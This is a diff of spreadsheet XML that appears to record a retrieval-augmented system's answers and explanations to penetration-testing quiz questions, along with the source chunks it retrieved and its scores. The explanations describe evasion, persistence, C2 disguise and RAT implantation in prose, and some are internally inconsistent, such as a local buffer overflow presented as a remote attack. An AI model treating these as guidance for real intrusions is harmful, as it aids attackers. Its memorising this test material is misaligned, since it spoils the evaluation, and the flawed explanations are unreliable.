 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 11de848f-7183-4deb-a4b1-aadd9133c4e9, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I103" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J103" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K103" t="inlineStr">
         <is>
@@ -7373,7 +6860,7 @@
       <c r="F104" t="inlineStr">
         <is>
           <t>Answer: Performing reflective DLL injection
-Explanation: Performing reflective DLL injection is the most effective technique for maintaining persistence on a target host machine without leaving on-disk artifacts and evading modern endpoint detection systems. This method involves injecting a DLL directly into the memory space of a running process, avoiding disk-based evidence and often evading detection by many endpoint security solutions that are configured to monitor disk and network activities but not necessarily sophisticated memory operations. Rootkit installation and disabling antivirus software via registry manipulation involve modifying system settings or files, which could be logged or reverted by system protections, and typically require system reboots or generate significant forensic artifacts.</t>
+Explanation: Performing reflective DLL injection is the most effective technique for maintaining persistence without leaving on-disk artifacts and evading modern endpoint detection systems. This method involves injecting a DLL directly into the memory space of a running process, avoiding disk-based evidence and often evading detection by many endpoint security solutions that are configured to monitor disk and network activities but not necessarily sophisticated memory operations. Rootkit installation and disabling antivirus software via registry manipulation involve modifying system settings or files, which could be logged or reverted by system protections, and typically require system reboots or generate significant forensic artifacts.</t>
         </is>
       </c>
       <c r="G104" t="inlineStr">
@@ -7387,21 +6874,16 @@
 preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 99c75208-0347-4943-851b-17857ce42681, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 6a3bf430-df4e-48ec-a031-aa60204cb560, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 99c75208-0347-4943-851b-17857ce42681, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I104" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J104" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K104" t="inlineStr">
         <is>
@@ -7440,7 +6922,7 @@
       <c r="F105" t="inlineStr">
         <is>
           <t>Answer: Using a NOP sled to ensure the shellcode is executed
-Explanation: In the scenario of exploiting a buffer overflow, using a NOP sled-'no operation' instructions preceding the actual malicious payload-is a critical technique. It increases the reliability of the exploit by creating a larger target for the overflow to hit, which ultimately directs execution to the shellcode. This is particularly useful given the variability in memory addresses and system configurations across different machines. Encrypting the payload, while useful for evading detection, doesn't address execution reliability. Exploiting a zero-day vulnerability and employing phishing attacks are not directly related to ensuring the exploit's reliability across different systems and configurations.</t>
+Explanation: In the scenario of exploiting a buffer overflow, using a NOP sled-'no operation' instructions preceding the actual malicious payload-is a critical technique. It increases the reliability of the exploit by creating a larger target for the overflow to hit, which ultimately directs execution to the shellcode. This is particularly useful given the variability in memory addresses and system configurations across different machines. Encrypting the payload, while useful for evading detection, doesn't address execution reliability. Exploiting a zero-day vulnerability may be effective but is not directly related to ensuring reliability across different systems and configurations. Employing phishing attacks to gather initial access credentials is unrelated to the technical discovery of software vulnerabilities like buffer overflows.</t>
         </is>
       </c>
       <c r="G105" t="inlineStr">
@@ -7454,21 +6936,16 @@
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 831f9734-1696-4ce4-bc1c-6b14be8556f2, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 831f9734-1696-4ce4-bc1c-6b14be8556f2, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I105" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J105" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K105" t="inlineStr">
         <is>
@@ -7507,7 +6984,7 @@
       <c r="F106" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow in a local program
-Explanation: A buffer overflow attack involves exploiting a vulnerability where data exceeds the storage capacity of the memory buffer, allowing an attacker to execute arbitrary code. This technique is most effective for executing arbitrary code on a target server without prior authentication. While SQL injection and cross-site scripting can lead to data extraction or manipulation, they do not inherently result in code execution on the server. A phishing campaign may gain access to corporate email accounts but does not directly allow for arbitrary code execution on the server.</t>
+Explanation: A buffer overflow in a local program is the most effective way among the given options to execute arbitrary code on a remote system without prior authentication. This technique involves exploiting a buffer overflow vulnerability, which typically occurs when data exceeds a buffer's capacity, leading to the execution of malicious code supplied by the attacker. SQL injection is primarily an attack vector into a system rather than a method for stealthy data exfiltration. Phishing campaigns targeting corporate email and cross-site scripting on client-side web applications are less effective in executing arbitrary code on a remote server without prior authentication.</t>
         </is>
       </c>
       <c r="G106" t="inlineStr">
@@ -7521,21 +6998,16 @@
 preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d299dde0-8cde-40ef-988a-6582c6a85a86, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 36e54dab-ab32-4509-abd8-e70613c1ce77, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I106" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J106" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K106" t="inlineStr">
         <is>
@@ -7574,7 +7046,7 @@
       <c r="F107" t="inlineStr">
         <is>
           <t>Answer: DLL Injection
-Explanation: DLL Injection is the most applicable technique for the scenario where adversaries intend to execute arbitrary code within the context of another process by loading a malicious dynamic-link library. This technique involves inserting a dynamic-link library (DLL) into the address space of another process, which will execute the malicious code contained in the DLL. Stack overflow involves exploiting vulnerable buffer to execute arbitrary code but doesn't involve process context manipulation. Race Condition generally applies to the scenario where the output is unexpectedly altered by the timing of uncontrollable events, and is less about inserting or executing code per se. Heap Spraying prepares the memory layout by filling the heap with copies of the payload, typically used in exploiting certain types of buffer overflow vulnerabilities but not specifically for loading a DLL into another process's context.</t>
+Explanation: DLL Injection is the most applicable technique for the scenario where adversaries intend to execute arbitrary code within the context of another process by loading a malicious dynamic-link library. This technique involves inserting a dynamic-link library (DLL) into the address space of another process, which will execute the malicious code contained in the DLL. Stack overflow involves exploiting vulnerable buffer to execute arbitrary code but doesn't involve process context manipulation. Race Condition generally applies to the scenario where the output is unexpectedly altered by the timing of uncontrollable events, and is less about inserting or executing code per se. Heap Spraying prepares the memory layout by filling the heap with copies of the payload, typically used in exploiting vulnerabilities that allow arbitrary code execution but doesn't directly involve loading a malicious DLL into another process.</t>
         </is>
       </c>
       <c r="G107" t="inlineStr">
@@ -7588,21 +7060,16 @@
 preemware_pentestingeval.pdf (Chunk: e78549e0-b496-4306-a1ed-09d66de728fb, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: fca5c541-a4a4-43b8-8b26-388e9cea155b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d106a4a8-f9f3-4c71-a034-d800334dd5a3, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I107" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J107" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K107" t="inlineStr">
         <is>
@@ -7641,7 +7108,7 @@
       <c r="F108" t="inlineStr">
         <is>
           <t>Answer: Binary diffing tools
-Explanation: Binary diffing tools are specifically designed to identify differences between two binary files. In the context of malware reverse engineering, these tools are instrumental when analyzing different versions of the same malware, as they help to pinpoint changes or evolutions in the malware's code, which might indicate new payloads, obfuscation techniques, or vulnerability exploits. Automated malware analysis platforms provide a broad analysis but are less focused on the detailed differences between binaries. Static code analyzers can be useful for identifying potential issues in source code, but they are not as effective at comparing different versions of binary files. Dynamic execution environments, while helpful for understanding how software behaves during runtime, do not specifically focus on identifying slight variations between two versions of the same malware sample.</t>
+Explanation: Binary diffing tools are specifically designed to identify differences between two binary files. In the case of malware reverse engineering, these tools are instrumental when analyzing different versions of the same malware, as they help to pinpoint changes or evolutions in the malware's code, which might indicate new payloads, obfuscation techniques, or vulnerability exploits. Automated malware analysis platforms provide a broad analysis but are less focused on the detailed differences between binaries. Static code analyzers can identify potential issues in the source code but are not as effective for comparing different versions of binary files. Dynamic execution environments, while useful for understanding how malware behaves during runtime, do not focus on identifying subtle variations between two versions of the same malware sample.</t>
         </is>
       </c>
       <c r="G108" t="inlineStr">
@@ -7655,21 +7122,16 @@
 preemware_pentestingeval.pdf (Chunk: 9024d739-2723-477e-be88-d5fbfabd0bc4, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: a1d06e69-76d1-44d2-b3ae-17403f4d666f, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 9c8cb7b3-6564-437c-abb3-13701475b3c2, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 910ca37f-8473-43ad-8ff6-39a3367872c4, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I108" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J108" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K108" t="inlineStr">
         <is>
@@ -7708,7 +7170,7 @@
       <c r="F109" t="inlineStr">
         <is>
           <t>Answer: Directory traversal
-Explanation: Directory traversal is an attack method that exploits weak security controls to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with dot-dot-slash (../) sequences and similar constructs, it's possible to access arbitrary files and directories stored on file system, including application source code, configuration and system files, and critical system data. Buffer overflow attacks target memory safety vulnerabilities, SQL injection manipulates database query strings, and Cross-site scripting (XSS) targets the users of the application by injecting malicious scripts. None of these directly exploit the file system in the context described.</t>
+Explanation: The question asks about an attack method that can be particularly effective against applications that do not properly validate user input when interacting with a file system. In this context, the most appropriate answer is directory traversal. A directory traversal attack occurs when an attacker exploits vulnerabilities in the application's handling of user-supplied input to access files outside the intended directory structure. By injecting specific characters like "../" or "../../", an attacker can manipulate the file path and potentially gain unauthorized access to sensitive files on the server. This type of vulnerability is directly related to improper validation of user input when interacting with a file system, making it the most relevant answer in this context.</t>
         </is>
       </c>
       <c r="G109" t="inlineStr">
@@ -7722,21 +7184,16 @@
 preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: sparse, Rank: 2)
 cowWhySo-pentest-redteam-steering.md (Chunk: 33ecd379-97a4-45c8-b746-61d94664fa50, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: f0173fe8-8eab-43e2-8ab3-d85e378e3eb7, Type: sparse, Rank: 4)
-tabby-writeup-w-o-metasploit.md (Chunk: a76250ef-2d17-4f52-a669-1b82c76eb468, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 950e23ef-ae90-498d-9955-66f87f185c40, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 72afb988-5c0b-4173-ac34-2220ef8a72e9, Type: sparse, Rank: 7)
-cowWhySo-pentest-redteam-steering.md (Chunk: f647c8c5-fcf6-4dcb-b81e-d617cf964606, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 10)</t>
+tabby-writeup-w-o-metasploit.md (Chunk: a76250ef-2d17-4f52-a669-1b82c76eb468, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I109" t="inlineStr">
         <is>
-          <t>Semantic: 3, Keyword: 7, Total: 10</t>
+          <t>Semantic: 1, Keyword: 4, Total: 5</t>
         </is>
       </c>
       <c r="J109" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K109" t="inlineStr">
         <is>
@@ -7775,7 +7232,7 @@
       <c r="F110" t="inlineStr">
         <is>
           <t>Answer: Command and Control (C2) traffic mimicking legitimate protocols
-Explanation: In advanced red team engagements, maintaining stealth while ensuring persistent access and control over a compromised system is crucial. The most effective technique among the options provided for this purpose is 'Command and Control (C2) traffic mimicking legitimate protocols'. This involves disguising malicious traffic to look like legitimate network traffic such as HTTP, HTTPS, or DNS, allowing the traffic to blend in with normal network activity. This method avoids detection by network monitoring tools and ensures persistent access and control over the compromised system. 'DNS tunneling using uncommonly high request rates' can trigger anomaly-based detection systems, 'Ransomware encryption to mask data exfiltration' is primarily a disruptive tool rather than a stealthy control mechanism, and 'Employing botnets for distributed denial-of-service (DDoS) attacks' is not directly related to maintaining persistent access and control over a compromised system.</t>
+Explanation: In advanced red team engagements, maintaining stealth while ensuring persistent access and control over a compromised system is crucial. The most effective technique among the options for achieving this is 'Command and Control (C2) traffic mimicking legitimate protocols.' This involves disguising malicious traffic to look like legitimate network traffic such as HTTP, HTTPS, or DNS, allowing the traffic to blend in with normal network activity, thus avoiding detection by network monitoring tools. Option 2, 'DNS tunneling using uncommonly high request rates,' can trigger anomaly-based detection systems and is less effective. Option 3, 'Ransomware encryption to mask data exfiltration,' is primarily a disruptive tool rather than a stealthy control mechanism, and it typically signals the end of the stealth phase of an operation. Finally, option 4, 'Employing botnets for distributed denial-of-service (DDoS) attacks,' though potentially useful in certain scenarios, is not directly related to maintaining persistent access and control over a compromised system.</t>
         </is>
       </c>
       <c r="G110" t="inlineStr">
@@ -7789,21 +7246,16 @@
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 950e23ef-ae90-498d-9955-66f87f185c40, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 608f8017-318e-4a0f-9ce4-2b9b37ef7214, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 9de1e388-e5f2-4d4a-ae47-ac3a137f820e, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I110" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J110" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K110" t="inlineStr">
         <is>
@@ -7853,24 +7305,19 @@
       <c r="H111" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: e771ddb8-4f50-4e2b-81b4-1ba587727fb7, Type: dense, Rank: 1)
-cowWhySo-pentest-redteam-steering.md (Chunk: 583f999c-7087-4fd6-8fb3-1777412520f7, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: sparse, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 4)
-granny-writeup-w-o-and-w-metasploit.md (Chunk: 7d664310-a568-4671-9fd2-0e4d5c6b8249, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 6)
-suryanshp1-kali-linux-pentesting-data.md (Chunk: 75c124e4-66c2-4411-82d1-d1faaf2bd3b3, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 7d0150f0-04da-4ebf-959a-52df1b6ee0c7, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 60ebd270-998c-47f2-98a3-628070e318cb, Type: dense, Rank: 9)
-suryanshp1-kali-linux-pentesting-data.md (Chunk: bdd4f605-a46f-4150-84fa-23a26e161e8b, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: sparse, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 3)
+granny-writeup-w-o-and-w-metasploit.md (Chunk: 7d664310-a568-4671-9fd2-0e4d5c6b8249, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I111" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J111" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K111" t="inlineStr">
         <is>
@@ -7909,7 +7356,7 @@
       <c r="F112" t="inlineStr">
         <is>
           <t>Answer: Using a debugger to identify function calls
-Explanation: Using a debugger to identify function calls is the most effective method among the options listed for inspecting and understanding the behavior of a compiled executable in the context of malware analysis. Debuggers allow the analyst to step through the code, view the state of registers, stack, and memory, and observe real-time execution flow and memory manipulation which are often crucial in pinpointing malicious activities. In contrast, examining network traffic is useful but it does not allow inspection of the internal workings of compiled code. Analyzing corrupt PDF files is a specific case of file analysis and does not generally apply to executable files. Conducting static analysis with automated tools is helpful but may not provide the depth needed to understand intricate malicious functionalities or to bypass obfuscation techniques typically found in malware.</t>
+Explanation: In the context of reverse engineering malware, using a debugger to identify function calls is the most effective method for understanding potentially malicious code functionality within a compiled executable. Debuggers allow analysts to step through the code, view the state of registers, stack, and memory, and observe real-time execution flow and memory manipulation which are often crucial in pinpointing malicious activities. While examining network traffic can be useful for understanding communication patterns, it does not directly help with inspecting the internal workings of compiled code. Analyzing corrupt PDF files is a specific case of file analysis and does not generally apply to executable files. Conducting static analysis using automated scanning tools can be helpful but may not provide the depth needed to understand intricate malicious functionalities or to bypass obfuscation techniques typically found in malware.</t>
         </is>
       </c>
       <c r="G112" t="inlineStr">
@@ -7923,21 +7370,16 @@
 preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: a1d06e69-76d1-44d2-b3ae-17403f4d666f, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 4e5b79c1-1f7a-487a-969b-e826f89f1cdf, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 9eff9f90-a6af-4772-be1c-2b9c8e1903fc, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 04959762-acf0-4790-99fb-7524a2352b4c, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I112" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J112" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K112" t="inlineStr">
         <is>
@@ -7990,21 +7432,16 @@
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 00dd62ed-7dfa-4bd3-ad8f-e2b1cba9ce52, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: sparse, Rank: 5)
-cowWhySo-pentest-redteam-steering.md (Chunk: 0f10f6d3-5dcc-4aad-bb64-5a4e62ffeeac, Type: dense, Rank: 6)
-cowWhySo-pentest-redteam-steering.md (Chunk: 40d494d7-40ba-4743-8500-683a95a5aceb, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I113" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J113" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K113" t="inlineStr">
         <is>
@@ -8043,7 +7480,7 @@
       <c r="F114" t="inlineStr">
         <is>
           <t>Answer: Injecting a RAT via buffer overflow in an outdated server software
-Explanation: Injecting a Remote Access Trojan (RAT) via buffer overflow in outdated server software is the optimal strategy for achieving long-term access to a target's internal network for ongoing data exfiltration. This method allows the red team to maintain control over the server and carry out data exfiltration discreetly over an extended period. A deauthentication attack using Aircrack-ng, while effective for disrupting network access, does not facilitate long-term network access or data extraction and is more aligned with denial-of-service tactics. Exploiting Heartbleed could theoretically extract sensitive memory contents but does not necessarily provide ongoing access, as it depends on repeated exploitation and favorable network conditions. Phishing attacks, while associated with state-sponsored industrial sabotage, are primarily used to harvest employee credentials rather than providing long-term access for data exfiltration.</t>
+Explanation: The most effective technique for gaining long-term access to a target's internal network for ongoing data exfiltration during a red team engagement is injecting a Remote Access Trojan (RAT) via buffer overflow in an outdated server software. This method allows the red team to maintain control over the server and carry out data exfiltration discreetly over an extended period. While deauthentication attacks using Aircrack-ng can disrupt network access, they do not facilitate long-term network access or data extraction. Exploiting Heartbleed could extract sensitive memory contents but does not necessarily provide ongoing access, as it depends on repeated exploitation and favorable network conditions. Phishing attacks contribute to harvesting employee credentials, which may grant initial access but are less effective for maintaining long-term access and ongoing data exfiltration.</t>
         </is>
       </c>
       <c r="G114" t="inlineStr">
@@ -8057,21 +7494,16 @@
 preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 7)
